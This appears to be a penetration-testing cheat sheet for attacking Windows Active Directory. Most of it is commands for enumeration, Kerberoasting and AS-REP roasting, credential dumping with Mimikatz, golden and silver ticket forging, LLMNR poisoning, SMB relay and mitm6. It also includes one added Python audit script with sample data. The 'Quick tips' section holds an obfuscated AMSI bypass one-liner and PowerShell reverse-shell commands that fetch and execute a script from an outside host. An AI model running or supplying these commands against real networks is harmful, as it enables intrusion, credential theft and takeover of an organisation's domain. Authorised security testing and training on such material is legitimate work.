Pentest Book
AD

Info

Basic Active Directory terms

Users

An agent represented by a user account.
    Regular user accounts (used by employees or for specific tasks such as backups)
    Computer accounts (the name ends with $). Computers in AD are a subclass of user objects.

Services

    Identified by an SPN, which indicates the service class and name, the owner and the host computer.
    Run as a process on a computer (the host of the service).
    Services (like any process) run in the context of a user account, with the privileges and permissions of that user.
    The SPNs of the services owned by a user are stored in the servicePrincipalName attribute of that account.
    Modifying a user's SPNs usually requires Domain Admin or a similar role.

General

# Anonymous Credential LDAP Dumping (<DC-IP> is a placeholder for the domain controller):
ldapsearch -LLL -x -H ldap://<DC-IP> -b '' -s base '(objectclass=*)'

# Impacket GetADUsers.py (Must have valid credentials)
GetADUsers.py -all -dc-ip <DC-IP> <domain>/<user>:<password>

# Impacket lookupsid.py
/usr/share/doc/python3-impacket/examples/lookupsid.py <user>:<password>@<DC-IP>

# Windapsearch:
# https://github.com/ropnop/windapsearch
python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
# Go version https://github.com/ropnop/go-windapsearch

# CME
cme smb IP -u '' -p '' --users --shares

# BloodHound
# https://github.com/BloodHoundAD/BloodHound/releases
# https://github.com/BloodHoundAD/SharpHound3
# https://github.com/chryzsh/DarthSidious/blob/master/enumeration/bloodhound.md
Import-Module .\SharpHound.ps1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -Domain target-domain -LDAPUser username -LDAPPass password
# Bloodhound.py (no shell needed) remote, LDAP auth
https://github.com/fox-it/BloodHound.py
bloodhound-python -u <user> -p '<password>' -ns <dc.ip> -d <domain.name> -c all
# BloodHound Cheatsheet
# https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
# Bloodhound complements
# https://github.com/RastreatorTeam/rastreator

# Rubeus
# https://github.com/GhostPack/Rubeus
## ASREPRoasting:
Rubeus.exe asreproast /format:<hashcat|john> /outfile:<output_hashes_file>
## Kerberoasting:
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"<SPN>"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."]
## Pass the key (PTK):
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Using the ticket on a Windows target:
Rubeus.exe ptt /ticket:<ticket_kirbi_file>

# Password Spraying tool
https://github.com/dafthack/DomainPasswordSpray

# Kerberoast
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

# PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Find-InterestingDomainShareFile -CheckAccess

# AD Cheatsheets
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet

# References:
https://wadcoms.github.io/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
https://github.com/infosecn1nja/AD-Attack-Defense
https://adsecurity.org/?page_id=1821
https://github.com/sense-of-security/ADRecon
https://adsecurity.org/?p=15
https://adsecurity.org/?cat=7
https://adsecurity.org/?page_id=4031
https://www.fuzzysecurity.com/tutorials/16.html
https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain
https://adsecurity.org/?p=1588
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://www.harmj0y.net/blog/tag/powerview/
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos

Common vulns

# Users having rights to add computers to domain
add-computer -domainname org.local -Credential ORG\john -restart -force

# AdminCount attribute set on common users
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
Import-Module ActiveDirectory
Get-AdObject -ldapfilter "(admincount=1)" -properties admincount

# High number of users in privileged groups
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
- Linux:
net rpc group members 'Schema Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Enterprise Admins' -I <DC-IP> -U "<USER>"%"<PASS>"
net rpc group members 'Domain Admins' -I 10.10.30.52 -U "john"%"pass123"

# Service accounts being members of Domain Admins
net group "Schema Admins" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# Excessive privileges allowing for shadow Domain Admins
Bloodhound/Sharphound

# Service accounts vulnerable to Kerberoasting
GetUserSPNs.py -request example.com/john:pass123
hashcat -m 13100 -a 0 -O --self-test-disable hashes.txt wordlist.txt

# Users with non-expiring passwords
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
grep DONT_EXPIRE_PASSWD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }

# Users with password not required
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
grep PASSWD_NOTREQD domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3}'
- PS
Import-Module ActiveDirectory
Get-ADUser -Filter {UserAccountControl -band 0x0020}

# Storing passwords using reversible encryption
mimikatz # lsadump::dcsync /domain:example.com /user:poorjohn

# Storing passwords using LM hashes
- In NTDS.dit (lines whose LM field is not the empty-LM value aad3b435b51404eeaad3b435b51404ee)
grep -iv ':aad3b435b51404eeaad3b435b51404ee:' dumped_hashes.txt

# Service accounts vulnerable to AS-REP roasting
GetNPUsers.py example.com/ -usersfile userlist.txt -format hashcat -no-pass
GetNPUsers.py example.com/john:pass123 -request -format hashcat
hashcat -m 18200 -a 0 -O --self-test-disable hashes.txt wordlist.txt
- PS
Import-Module ActiveDirectory
Get-ADUser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name

# Weak domain password policy
net accounts /domain
polenum --username john --password pass123 --domain 10.10.51.11
enum4linux -P -u john -p pass123 -w dom.local 172.21.1.60

# Inactive domain accounts
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
sort -t ';' -k 8 domain_users.grep | grep -v ACCOUNT_DISABLED | awk -F ';' '{print $3, $8}'

# Privileged users with password reset overdue
python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1
jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json > privileged_users.txt

while read user; do grep ";${user};" domain_users.grep; done < privileged_users.txt | \
grep -v ACCOUNT_DISABLED | sort -t ';' -k 10 | awk -F ';' '{print $3, $10}'

# Users with a weak password
$a = [adsisearcher]"(&(objectCategory=person)(objectClass=user))"
$a.PropertiesToLoad.Add("samaccountname") | Out-Null
$a.PageSize = 1
$a.FindAll() | % { echo $_.properties.samaccountname } > users.txt

Import-Module ./adlogin.ps1
adlogin users.txt domain.com password123

# Credentials in SYSVOL and Group Policy Preferences (GPP)
findstr /s /n /i /p password \\example.com\sysvol\example.com\*
mount.cifs -o domain=example.com,username=john,password="<password>" //10.10.139.115/SYSVOL /mnt
grep -ir 'password' /mnt
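The account checks above (password not required, non-expiring passwords, AS-REP roastable, reversible encryption, Kerberoastable SPNs, adminCount users with overdue password resets) all reduce to reading the userAccountControl bits and a few attributes of each user. This added example, not part of the original page or of ldapdomaindump, performs them in one pass over the list-valued attribute layout of domain_users.json; the user records are constructed sample data and the 365-day password-age threshold is an assumption.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bits (UF_* values from MS-SAMR); ldapdomaindump prints them as the
# ACCOUNT_DISABLED / PASSWD_NOTREQD / DONT_EXPIRE_PASSWD text the greps above match on
ACCOUNT_DISABLED = 0x0002
PASSWD_NOTREQD = 0x0020
REVERSIBLE_PASSWD = 0x0080    # ENCRYPTED_TEXT_PASSWORD_ALLOWED
DONT_EXPIRE_PASSWD = 0x10000
DONT_REQ_PREAUTH = 0x400000   # AS-REP roastable

def audit_users(users, now, max_pwd_age_days=365):
    """Map each finding to the sAMAccountNames it applies to (attribute values are lists)."""
    findings = {k: [] for k in ("password_not_required", "password_never_expires",
                                "asrep_roastable", "reversible_encryption",
                                "kerberoastable", "privileged", "privileged_pwd_overdue")}
    for u in users:
        name = u["sAMAccountName"][0]
        uac = int(u.get("userAccountControl", [0])[0])
        if uac & ACCOUNT_DISABLED:
            continue  # disabled accounts are excluded, as the greps above do
        for bit, finding in ((PASSWD_NOTREQD, "password_not_required"),
                             (DONT_EXPIRE_PASSWD, "password_never_expires"),
                             (DONT_REQ_PREAUTH, "asrep_roastable"),
                             (REVERSIBLE_PASSWD, "reversible_encryption")):
            if uac & bit:
                findings[finding].append(name)
        # a user (not a computer account, whose name ends in $) holding an SPN is Kerberoastable
        if u.get("servicePrincipalName") and not name.endswith("$"):
            findings["kerberoastable"].append(name)
        if u.get("adminCount", [0])[0] == 1:
            findings["privileged"].append(name)
            if now - datetime.fromisoformat(u["pwdLastSet"][0]) > timedelta(days=max_pwd_age_days):
                findings["privileged_pwd_overdue"].append(name)
    return findings

# Constructed sample, not real data, in the list-valued attribute layout of domain_users.json
SAMPLE_NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_USERS = [
    {"sAMAccountName": ["john"], "userAccountControl": [512], "adminCount": [0],
     "pwdLastSet": ["2024-01-10 09:00:00+00:00"]},
    {"sAMAccountName": ["svc_sql"], "userAccountControl": [66048], "adminCount": [1],  # never expires
     "pwdLastSet": ["2019-05-01 09:00:00+00:00"], "servicePrincipalName": ["MSSQLSvc/sql01.example.com:1433"]},
    {"sAMAccountName": ["legacy"], "userAccountControl": [4194848], "adminCount": [0],  # no pwd, no preauth
     "pwdLastSet": ["2024-01-10 09:00:00+00:00"]},
    {"sAMAccountName": ["olduser"], "userAccountControl": [514], "adminCount": [1],  # disabled
     "pwdLastSet": ["2015-01-01 00:00:00+00:00"]},
    {"sAMAccountName": ["WS01$"], "userAccountControl": [4096], "adminCount": [0],  # computer account
     "pwdLastSet": ["2024-01-10 09:00:00+00:00"], "servicePrincipalName": ["HOST/WS01.example.com"]},
]
```

Calling audit_users(SAMPLE_USERS, SAMPLE_NOW) flags svc_sql as Kerberoastable, privileged, non-expiring and overdue, flags legacy for PASSWD_NOTREQD and missing pre-auth, and ignores the disabled and computer accounts.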

Quick tips

# AMSI bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

# PowerShell execution policy bypass
powershell -ep bypass

# To feed the output of the first command into the second command, use this PowerShell technique
# %{} is an alias for ForEach-Object{}
# ?{} is an alias for Where-Object{}
# $_ is the current pipeline object
<First command> | %{<Second command> -<argument> $_}

# To filter objects by a property value, use this technique with a pipe.
?{$_.<property> -eq '<value>'}

# Find local admin access
Find-LocalAdminAccess

# Get domain SID
Get-DomainSID
Arguments: -Domain "domain name"

# Get DC
Get-NetDomainController
Arguments: -Domain "domain name"

# Get users in current domain
Get-NetUser
Arguments: -UserName "username"

# Get user properties
Get-UserProperty
Arguments: -Properties pwdlastset

# Search for a particular string in a user's attributes
Find-UserField -SearchField Description -SearchTerm "built"

# Get all computers
Get-NetComputer -FullData
Many arguments: -OperatingSystem -Ping -FullData

# Get groups
Get-NetGroup
Arguments: -FullData -Domain

# Get members of a particular group
Get-NetGroupMember -GroupName "Domain Admins"

# Group Policies
Get-NetGPO
Get-NetGPO -ComputerName <computer>
Get-NetGPOGroup

# Get users that are part of a machine's local Admin group
Find-GPOComputerAdmin -ComputerName <computer>

# Get OUs
Get-NetOU -FullData
Get-NetGPO -GPOname <GPO name>

# Mapping forest
Get-NetForest -Verbose
Get-NetForestDomain -Verbose

# Mapping trust
Get-NetDomainTrust
Arguments: -Domain
Get-NetForestDomain -Verbose | Get-NetDomainTrust

# Finding Constrained Delegation
Get-DomainUser -TrustedToAuth (PowerView dev branch)

# Finding Unconstrained Delegation
Get-NetComputer -Unconstrained

# Get ACLs
Get-ObjectAcl -SamAccountName <name> -ResolveGUIDs
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose

# Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs

# Reverse Shell
powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.113/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.X -Port 443
powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.113 -Port 443

# Mimikatz
# Make NTLM PS-session (pass-the-hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell.exe"'

# Dump creds
Invoke-Mimikatz
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
(DCSync requires the three replication rights: Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set)

# Tickets
Inject ticket:
Invoke-Mimikatz -Command '"kerberos::ptt <location of .kirbi ticket>"'
Export tickets:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Golden ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<DomainName> /sid:<Domain's SID> /krbtgt:<krbtgt hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

# Silver ticket
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DomainName> /sid:<DomainSID> /target:<target> /service:<ServiceType> /rc4:<rc4 NTLM Hash of user> /user:<UserToImpersonate> /ptt"'

# TGT ticket
kekeo.exe tgt::ask /user:<user name> /domain:<domain name> /rc4:<rc4 NTLM Hash of user>

# TGS ticket
kekeo.exe
tgs::s4u /tgt:tgt_ticket.kirbi /user:<user>@<domain> /service:<service name>/<server name>

LLMNR Poisoning

# LLMNR is the successor of NBT-NS
# Hosts fall back to it to identify names that DNS cannot resolve
# The responding service receives the user's username and NTLMv2 hash

# Capturing NTLMv2 with Responder
responder -I eth0 -rdwv

# Cracking NTLMv2
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force

SMB Relay Attack

# SMB signing must be disabled on the target for this to work
# The user whose credentials are being relayed should be an admin on both machines

# Discover hosts with SMB signing disabled
nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24

# SMB Relay Attack
# Set SMB and HTTP to Off in Responder.conf
responder -I eth0 -rdwv
ntlmrelayx.py -tf target.txt -smb2support

IPv6 DNS Takeover via Mitm6

git clone https://github.com/fox-it/mitm6.git
pip install mitm6
mitm6 -d domain.name
# While the previous step is running, in another terminal run
ntlmrelayx.py -6 -t ldaps://192.168.176.129 -wh fakewpadhost.domain.name -l dir

AD Mindmap

https://t.co/hE0VKO5b2I?amp=1
Pentesting_Active_directory
https://xmind.net/m/5dypm8/